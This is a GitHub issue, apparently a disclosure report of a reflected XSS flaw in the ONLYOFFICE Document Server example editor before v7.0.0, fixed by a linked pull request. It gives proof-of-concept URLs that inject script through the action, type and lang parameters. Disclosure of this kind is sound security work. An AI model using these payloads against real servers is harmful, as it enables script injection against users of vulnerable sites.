You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
[Vulnerability Report] XSS vulnerability in ONLYOFFICE Document Server Example before v7.0.0 , allows remote attackers inject arbitrary HTML or JavaScript
#252
Closed
Bruce-C1 opened this issue
Jan 28, 2022
· 1 comment
· Fixed by #253
In this scenario, the example is used to exploit this vulnerability, but it is a code example of a Document Management System that is used for testing purposes only and is not used in a production environment.
Document Server's example is disabled by default and is not accessible without enabling it first.
There is no such vulnerability present in a fully-fledged and integrated Document Server.
Vulnerability Summary
XSS vulnerability in ONLYOFFICE Document Server Example before v7.0.0 , allows remote attackers inject arbitrary HTML or JavaScript.
Vulnerability Url
http://server.domain/example/editor?action=19319874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
http://server.domain/example/editor?fileName=new.docx&type=19874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
http://server.domain/example/editor?lang=11111%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability Description
The XSS vulnerability is in several parameters of the path ‘/example/editor’ in ONLYOFFICE Document Server before v7.0.0.
Test Server Version: 7.0.0 Build:132
##Steps To Reproduce
Vulnerability param: action
Vulnerability URL:
http://server.domain/example/editor?action=19319874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability param: type
Vulnerability URL:
http://server.domainexample/editor?fileName=new.docx&type=19874%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability param: lang
Vulnerability URL:
http://server.domain/example/editor?lang=11111%22%3E%3C/script%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
Vulnerability Solution
Close the test example in Document Server
The text was updated successfully, but these errors were encountered: